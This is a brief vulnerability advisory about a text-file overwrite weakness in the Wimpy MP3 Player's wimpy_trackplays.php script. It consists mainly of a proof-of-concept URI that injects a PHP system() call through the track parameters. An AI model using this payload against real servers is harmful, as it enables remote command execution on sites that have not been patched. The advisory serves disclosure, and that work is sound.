Wimpy MP3 Player Text File Overwrite Weakness

Wimpy MP3 Player Text File Overwrite Weakness

An exploit is not required.

The following proof of concept URI is available:
http://www.example.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>